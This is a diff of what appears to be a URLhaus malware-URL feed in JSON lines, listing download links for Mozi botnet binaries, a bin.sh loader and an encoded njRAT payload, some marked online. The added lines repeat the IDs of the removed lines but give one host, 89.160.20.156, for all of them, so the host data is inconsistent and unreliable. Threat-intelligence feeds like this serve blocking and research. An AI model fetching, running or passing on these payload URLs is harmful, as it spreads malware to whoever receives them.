-{"id":"960975","urlhaus_reference":"https://urlhaus.abuse.ch/url/960975/","url":"http://59.99.137.157:56649/Mozi.m","url_status":"offline","host":"59.99.137.157","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960971","urlhaus_reference":"https://urlhaus.abuse.ch/url/960971/","url":"http://59.99.137.202:55457/Mozi.m","url_status":"offline","host":"59.99.137.202","date_added":"2021-01-14 16:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960968","urlhaus_reference":"https://urlhaus.abuse.ch/url/960968/","url":"http://59.93.16.213:52314/Mozi.m","url_status":"offline","host":"59.93.16.213","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960969","urlhaus_reference":"https://urlhaus.abuse.ch/url/960969/","url":"http://42.230.56.231:41985/Mozi.m","url_status":"online","host":"42.230.56.231","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960970","urlhaus_reference":"https://urlhaus.abuse.ch/url/960970/","url":"http://125.41.97.157:53197/i","url_status":"online","host":"125.41.97.157","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"960967","urlhaus_reference":"https://urlhaus.abuse.ch/url/960967/","url":"http://125.43.61.168:54472/Mozi.m","url_status":"online","host":"125.43.61.168","date_added":"2021-01-14 16:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960966","urlhaus_reference":"https://urlhaus.abuse.ch/url/960966/","url":"http://219.154.101.44:38100/Mozi.m","url_status":"offline","host":"219.154.101.44","date_added":"2021-01-14 16:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960964","urlhaus_reference":"https://urlhaus.abuse.ch/url/960964/","url":"http://189.51.126.160:33121/Mozi.m","url_status":"offline","host":"189.51.126.160","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960965","urlhaus_reference":"https://urlhaus.abuse.ch/url/960965/","url":"http://14.154.28.65:39363/Mozi.m","url_status":"online","host":"14.154.28.65","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960961","urlhaus_reference":"https://urlhaus.abuse.ch/url/960961/","url":"http://182.119.18.6:42844/Mozi.m","url_status":"online","host":"182.119.18.6","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960962","urlhaus_reference":"https://urlhaus.abuse.ch/url/960962/","url":"http://219.156.209.2:45789/Mozi.a","url_status":"online","host":"219.156.209.2","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960963","urlhaus_reference":"https://urlhaus.abuse.ch/url/960963/","url":"http://221.15.193.168:34080/Mozi.m","url_status":"online","host":"221.15.193.168","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960960","urlhaus_reference":"https://urlhaus.abuse.ch/url/960960/","url":"http://117.194.161.162:56067/Mozi.m","url_status":"offline","host":"117.194.161.162","date_added":"2021-01-14 16:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960959","urlhaus_reference":"https://urlhaus.abuse.ch/url/960959/","url":"http://117.215.208.204:34205/Mozi.m","url_status":"offline","host":"117.215.208.204","date_added":"2021-01-14 16:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960957","urlhaus_reference":"https://urlhaus.abuse.ch/url/960957/","url":"http://117.222.162.116:53239/Mozi.m","url_status":"offline","host":"117.222.162.116","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960958","urlhaus_reference":"https://urlhaus.abuse.ch/url/960958/","url":"http://117.215.209.95:53868/Mozi.m","url_status":"offline","host":"117.215.209.95","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960955","urlhaus_reference":"https://urlhaus.abuse.ch/url/960955/","url":"http://116.75.192.72:39724/Mozi.m","url_status":"offline","host":"116.75.192.72","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960956","urlhaus_reference":"https://urlhaus.abuse.ch/url/960956/","url":"http://117.213.43.181:60804/Mozi.m","url_status":"offline","host":"117.213.43.181","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960953","urlhaus_reference":"https://urlhaus.abuse.ch/url/960953/","url":"http://123.5.149.145:51949/Mozi.m","url_status":"online","host":"123.5.149.145","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960954","urlhaus_reference":"https://urlhaus.abuse.ch/url/960954/","url":"http://125.41.114.210:48224/Mozi.m","url_status":"online","host":"125.41.114.210","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960952","urlhaus_reference":"https://urlhaus.abuse.ch/url/960952/","url":"http://113.201.171.61:37716/Mozi.m","url_status":"online","host":"113.201.171.61","date_added":"2021-01-14 16:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960951","urlhaus_reference":"https://urlhaus.abuse.ch/url/960951/","url":"http://101.108.135.252:60524/Mozi.m","url_status":"offline","host":"101.108.135.252","date_added":"2021-01-14 16:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961008","urlhaus_reference":"https://urlhaus.abuse.ch/url/961008/","url":"http://89.160.20.156:45117/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:25:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961007","urlhaus_reference":"https://urlhaus.abuse.ch/url/961007/","url":"http://89.160.20.156:41485/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:22:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961006","urlhaus_reference":"https://urlhaus.abuse.ch/url/961006/","url":"http://89.160.20.156:43851/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:22:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961005","urlhaus_reference":"https://urlhaus.abuse.ch/url/961005/","url":"http://89.160.20.156:37095/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:22:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961004","urlhaus_reference":"https://urlhaus.abuse.ch/url/961004/","url":"http://89.160.20.156:59275/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961002","urlhaus_reference":"https://urlhaus.abuse.ch/url/961002/","url":"http://89.160.20.156:46131/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961003","urlhaus_reference":"https://urlhaus.abuse.ch/url/961003/","url":"http://89.160.20.156:40129/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961000","urlhaus_reference":"https://urlhaus.abuse.ch/url/961000/","url":"http://89.160.20.156:43924/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961001","urlhaus_reference":"https://urlhaus.abuse.ch/url/961001/","url":"http://89.160.20.156:38851/i","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960996","urlhaus_reference":"https://urlhaus.abuse.ch/url/960996/","url":"http://89.160.20.156:33008/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960997","urlhaus_reference":"https://urlhaus.abuse.ch/url/960997/","url":"http://89.160.20.156:60201/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960998","urlhaus_reference":"https://urlhaus.abuse.ch/url/960998/","url":"http://89.160.20.156:41479/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960999","urlhaus_reference":"https://urlhaus.abuse.ch/url/960999/","url":"http://89.160.20.156:52003/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960995","urlhaus_reference":"https://urlhaus.abuse.ch/url/960995/","url":"http://89.160.20.156:39500/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:20:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960994","urlhaus_reference":"https://urlhaus.abuse.ch/url/960994/","url":"http://89.160.20.156:36966/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960991","urlhaus_reference":"https://urlhaus.abuse.ch/url/960991/","url":"http://89.160.20.156:59875/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960992","urlhaus_reference":"https://urlhaus.abuse.ch/url/960992/","url":"http://89.160.20.156:44123/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960993","urlhaus_reference":"https://urlhaus.abuse.ch/url/960993/","url":"http://89.160.20.156:45224/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960990","urlhaus_reference":"https://urlhaus.abuse.ch/url/960990/","url":"http://89.160.20.156:43105/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960984","urlhaus_reference":"https://urlhaus.abuse.ch/url/960984/","url":"http://89.160.20.156:46011/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960985","urlhaus_reference":"https://urlhaus.abuse.ch/url/960985/","url":"http://89.160.20.156:51170/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960986","urlhaus_reference":"https://urlhaus.abuse.ch/url/960986/","url":"http://89.160.20.156:38025/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960987","urlhaus_reference":"https://urlhaus.abuse.ch/url/960987/","url":"http://89.160.20.156:54132/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960988","urlhaus_reference":"https://urlhaus.abuse.ch/url/960988/","url":"http://89.160.20.156:57705/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960989","urlhaus_reference":"https://urlhaus.abuse.ch/url/960989/","url":"http://89.160.20.156:32983/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960983","urlhaus_reference":"https://urlhaus.abuse.ch/url/960983/","url":"http://89.160.20.156:47908/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960982","urlhaus_reference":"https://urlhaus.abuse.ch/url/960982/","url":"http://89.160.20.156:35116/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960978","urlhaus_reference":"https://urlhaus.abuse.ch/url/960978/","url":"http://89.160.20.156:38070/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960979","urlhaus_reference":"https://urlhaus.abuse.ch/url/960979/","url":"http://89.160.20.156:53399/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960980","urlhaus_reference":"https://urlhaus.abuse.ch/url/960980/","url":"http://89.160.20.156:39529/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960981","urlhaus_reference":"https://urlhaus.abuse.ch/url/960981/","url":"http://89.160.20.156:33465/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960977","urlhaus_reference":"https://urlhaus.abuse.ch/url/960977/","url":"http://89.160.20.156:59085/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:16:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} +{"id":"960976","urlhaus_reference":"https://urlhaus.abuse.ch/url/960976/","url":"http://89.160.20.156:33799/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:09:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960972","urlhaus_reference":"https://urlhaus.abuse.ch/url/960972/","url":"http://89.160.20.156:40430/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960973","urlhaus_reference":"https://urlhaus.abuse.ch/url/960973/","url":"http://89.160.20.156:43006/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960974","urlhaus_reference":"https://urlhaus.abuse.ch/url/960974/","url":"http://89.160.20.156:33385/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960975","urlhaus_reference":"https://urlhaus.abuse.ch/url/960975/","url":"http://89.160.20.156:56649/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960971","urlhaus_reference":"https://urlhaus.abuse.ch/url/960971/","url":"http://89.160.20.156:55457/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960968","urlhaus_reference":"https://urlhaus.abuse.ch/url/960968/","url":"http://89.160.20.156:52314/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960969","urlhaus_reference":"https://urlhaus.abuse.ch/url/960969/","url":"http://89.160.20.156:41985/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960970","urlhaus_reference":"https://urlhaus.abuse.ch/url/960970/","url":"http://89.160.20.156:53197/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960967","urlhaus_reference":"https://urlhaus.abuse.ch/url/960967/","url":"http://89.160.20.156:54472/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960966","urlhaus_reference":"https://urlhaus.abuse.ch/url/960966/","url":"http://89.160.20.156:38100/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960964","urlhaus_reference":"https://urlhaus.abuse.ch/url/960964/","url":"http://89.160.20.156:33121/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960965","urlhaus_reference":"https://urlhaus.abuse.ch/url/960965/","url":"http://89.160.20.156:39363/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960961","urlhaus_reference":"https://urlhaus.abuse.ch/url/960961/","url":"http://89.160.20.156:42844/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960962","urlhaus_reference":"https://urlhaus.abuse.ch/url/960962/","url":"http://89.160.20.156:45789/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960963","urlhaus_reference":"https://urlhaus.abuse.ch/url/960963/","url":"http://89.160.20.156:34080/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960960","urlhaus_reference":"https://urlhaus.abuse.ch/url/960960/","url":"http://89.160.20.156:56067/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960959","urlhaus_reference":"https://urlhaus.abuse.ch/url/960959/","url":"http://89.160.20.156:34205/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960957","urlhaus_reference":"https://urlhaus.abuse.ch/url/960957/","url":"http://89.160.20.156:53239/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960958","urlhaus_reference":"https://urlhaus.abuse.ch/url/960958/","url":"http://89.160.20.156:53868/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960955","urlhaus_reference":"https://urlhaus.abuse.ch/url/960955/","url":"http://89.160.20.156:39724/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960956","urlhaus_reference":"https://urlhaus.abuse.ch/url/960956/","url":"http://89.160.20.156:60804/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960953","urlhaus_reference":"https://urlhaus.abuse.ch/url/960953/","url":"http://89.160.20.156:51949/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960954","urlhaus_reference":"https://urlhaus.abuse.ch/url/960954/","url":"http://89.160.20.156:48224/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960952","urlhaus_reference":"https://urlhaus.abuse.ch/url/960952/","url":"http://89.160.20.156:37716/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960951","urlhaus_reference":"https://urlhaus.abuse.ch/url/960951/","url":"http://89.160.20.156:60524/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} {"id":"960946","urlhaus_reference":"https://urlhaus.abuse.ch/url/960946/","url":"http://urlfrance.fr/code/dd.txt","url_status":"offline","host":"urlfrance.fr","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["Encoded","njRAT","rat"]} -{"id":"960947","urlhaus_reference":"https://urlhaus.abuse.ch/url/960947/","url":"http://136.34.57.224:49988/bin.sh","url_status":"online","host":"136.34.57.224","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"960948","urlhaus_reference":"https://urlhaus.abuse.ch/url/960948/","url":"http://115.50.64.136:42857/Mozi.m","url_status":"online","host":"115.50.64.136","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 